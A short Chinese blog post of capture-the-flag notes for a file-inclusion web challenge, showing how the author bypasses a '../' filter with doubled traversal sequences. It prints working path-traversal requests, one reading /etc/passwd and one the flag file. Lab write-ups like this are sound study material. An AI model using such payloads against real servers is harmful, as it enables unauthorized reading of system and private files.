刷题笔记:virink_2019_files_share

CTF Web 文件包含
Web
发布日期:   2021-09-10
更新日期:   2022-01-28
文章字数:   131
阅读时长:   1 分

前言

关键字:[魔方]

题解

index.js文件有这种混淆代码,必有蹊跷。

得,折腾半天整不出来,原来不在这里。

/uploads目录遍历是开着的

读取下/etc/passwd

似乎有过滤

显然,..//被替换为空,但可以双写绕过

preview?f=..././..././..././..././..././..././etc..//passwd

没想到最后得再加个/flag,实在想不到

/preview?f=..././..././..././..././..././..././f1ag_Is_h3re..//flag
文章作者: 巡璃
文章链接: https://syunaht.com/p/170828619.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 巡璃 !
CTF Web 文件包含
评论
  目录